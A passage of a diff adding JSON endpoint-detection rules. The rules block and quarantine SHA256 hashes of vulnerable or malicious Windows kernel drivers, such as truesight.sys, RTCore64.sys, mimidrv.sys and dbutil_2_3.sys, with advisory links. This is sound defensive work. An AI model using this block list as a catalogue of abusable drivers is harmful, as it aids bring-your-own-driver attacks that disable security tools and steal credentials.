+ "type": "hash",
+ "value": "d4e4ec99d8c460bbe7a13c1e8ff54dedcbf45b6fbd204eb6a628c25933d8f2b5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae48bbea-c71b-5880-a655-221694433305",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462199Z",
+ "creation_date": "2026-03-23T11:45:30.462203Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82fea578188662b4ed6df4c3aaaf6ebae72a6cd2f8bf135a89150cca1769156b",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae526818-b10c-57db-aec5-d7946e11b165",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818213Z",
+ "creation_date": "2026-03-23T11:45:31.818216Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818224Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "557df7d5121ad120c2969b470757e44291abc2bdd2e3b0c60772d5c5f1bc23c2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae596425-e3e7-5329-8a5c-5641c3e37ede",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830257Z",
+ "creation_date": "2026-03-23T11:45:31.830259Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830264Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "429f5d277168ca8c967b1502381190fbaa147707feb6ff580a371fe29045337a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae5e89b9-4a3c-50ad-a710-2655ba969617",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460408Z",
+ "creation_date": "2026-03-23T11:45:30.460411Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460420Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54bf602a6f1baaec5809a630a5c33f76f1c3147e4b05cecf17b96a93b1d41dca",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae827a04-2ff5-58fa-bbec-8574e2dfef4e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469486Z",
+ "creation_date": "2026-03-23T11:45:30.469489Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469498Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "374bb09b4d6a9f21a5e2320343068bd44848f396d9b25a6f4d80931e6d9505ce",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae830a4f-c9dc-5d2a-b666-054bde0122bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ 
"last_update": "2026-03-23T11:45:31.491369Z", + "creation_date": "2026-03-23T11:45:31.491372Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491380Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "97445ce282a3f1fa81f60aad2897c04627510fe8aabf82bae7dab7c3557bccec", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ae86594e-5289-5edf-852f-c361582b9f21", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967567Z", + "creation_date": "2026-03-23T11:45:29.967569Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967575Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f83c357106a7d1d055b5cb75c8414aa3219354deb16ae9ee7efe8ee4c8c670ca", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ae876ee6-441e-545d-81e3-9eba6c401dac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150461Z", + "creation_date": "2026-03-23T11:45:31.150463Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150468Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe1f8fbbcc623adace57f324e95ba90c3d31180dda932e84bcb6172da78af133", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ae8beed8-1877-5929-976b-19aeda4277d5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477516Z", + "creation_date": "2026-03-23T11:45:31.477519Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477529Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4fe85d8e2dc09a022c6c2a2f3cba4c656bf74785a896de052b60c67fa3ba55b0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ae907d59-39c2-5da8-ba3c-b4dfeb5d1420", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608103Z", + "creation_date": "2026-03-23T11:45:29.608105Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608110Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ae98a251-5578-5348-b099-c2ecb176884e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 
10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610794Z", + "creation_date": "2026-03-23T11:45:29.610796Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610801Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dbb457ae1bd07a945a1466ce4a206c625e590aee3922fa7d86fbe956beccfc98", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aeb7583e-f49d-5838-868f-ae10be7abc2f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604699Z", + "creation_date": "2026-03-23T11:45:29.604701Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604707Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, 
+ "references": [], + "type": "hash", + "value": "de6bf572d39e2611773e7a01f0388f84fb25da6cba2f1f8b9b36ffba467de6fa", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aec922b7-116e-5c07-9413-eea77b1a5cf9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818465Z", + "creation_date": "2026-03-23T11:45:31.818468Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818478Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a079dc1a975c5ec4aa199a683917e83aa919f60d0fa4a2db2964fab0c79949bb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aed057d0-78e2-5a96-8df2-66378a4cc35a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826207Z", + "creation_date": "2026-03-23T11:45:30.826209Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826215Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3438e79b93d2a31d2da9a18a806cf3baaf0e75ae238cad04e3013e7e546256f1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aee014f5-8d4f-5fe2-9763-451b59aac9ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470490Z", + "creation_date": "2026-03-23T11:45:30.470494Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470503Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bdd173909efc3bb3c5d216ea0fd9ec5e935c2572ef48973eeb0917b733ff754c", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aee701b0-c2e3-531a-b1fc-dd3bcf7eb01d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607204Z", + "creation_date": "2026-03-23T11:45:29.607206Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607212Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe4270a61dbed978c28b2915fcc2826d011148dcb7533fa8bd072ddce5944cef", + "comment": "Dell vulnerable driver (aka dbutil_2_3.sys) [CVE-2021-21551] [https://github.com/SpikySabra/Kernel-Cactus] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aee838be-03a4-5c4c-a1a3-3df8ccb52f2b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984982Z", + "creation_date": "2026-03-23T11:45:29.984986Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984994Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb11a4270a6980a97ea8775422dacbd1e763b7e5898f0a80c71c91449fff7ab4", + "comment": "Dangerous Physmem Kernel Driver (aka BS_Def64.Sys) [https://www.loldrivers.io/drivers/4a80da66-f8f1-4af9-ba56-696cfe6c1e10/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "aeecb672-0bee-5bc7-b8b9-749cc6c06120", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985898Z", + "creation_date": "2026-03-23T11:45:29.985900Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985905Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "24c900024d213549502301c366d18c318887630f04c96bf0a3d6ba74e0df164f", + "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"aeee4d0e-095b-5bb9-8c98-17a3ef01269e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981314Z", + "creation_date": "2026-03-23T11:45:29.981316Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981322Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e2622d8e7a0ec136ba1fff639833f05137f8a1ff03e7a93b9a4aea25e7abb8d", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af0ce512-2ea3-5221-a5ae-eb53191a24df", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487631Z", + "creation_date": "2026-03-23T11:45:31.487633Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487639Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c6692a2d344410c24137e8b1d9fb8756167c7e29139a9148699bc68144faf2fa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af0d2ee1-0202-5f5f-a533-7385c2d84670", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825835Z", + "creation_date": "2026-03-23T11:45:30.825837Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825843Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d029a7d13535a3f296fa0699be78aa3566b92593f60d5842c816488cff36693c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af12f81d-eb60-5ea0-bc6e-1bd268a67ec4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477607Z", + "creation_date": "2026-03-23T11:45:30.477611Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477620Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7cf756afcaf2ce4f8fb479fdede152a17eabf4c5c7c329699dab026a4c1d4fd0", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af18d9e0-72d1-5a9f-ae4f-1a4c62ca085f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151212Z", + "creation_date": "2026-03-23T11:45:31.151214Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151220Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"ccd57ee422366be97722b902cf530d071bc7315cbad77c6ebf86a432f685c4b4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af1a895d-8eea-58d9-93d9-6eb2aa8d5c10", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472094Z", + "creation_date": "2026-03-23T11:45:30.472098Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472107Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 